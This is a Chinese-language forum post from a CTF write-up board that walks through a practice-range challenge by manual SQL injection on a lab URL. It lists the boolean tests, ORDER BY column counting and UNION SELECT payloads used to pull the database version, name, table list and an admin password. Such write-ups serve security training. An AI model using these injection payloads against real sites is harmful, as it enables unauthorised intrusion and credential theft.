论坛首页 > CTF&WP专版

靶场第一题 九五作业

九五   ·   发表于 2018-07-31 15:56:13   ·   CTF&WP专版

点击查看新闻得到网址http://120.203.13.75:6815/?id=1

尝试?id=1 and 1=1 页面正常,?id=1 and 1=2,页面显示不正常,判断存在注入点

猜测字段数?id=1 order by 5,最后尝试?id=1 order by 2页面正常

查询数据库版本and 1=2 union select 1,version()

得到数据库版本5.5.53  

查询数据库名称and 1=2 union select 1,database()

得到名称maoshe

查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

得到表面admin

查询密码and 1=2 union select 1,password from admin

得到密码hellohack

打赏我,让我更有动力~

0 条回复   |  直到 2018-7-31 | 989 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.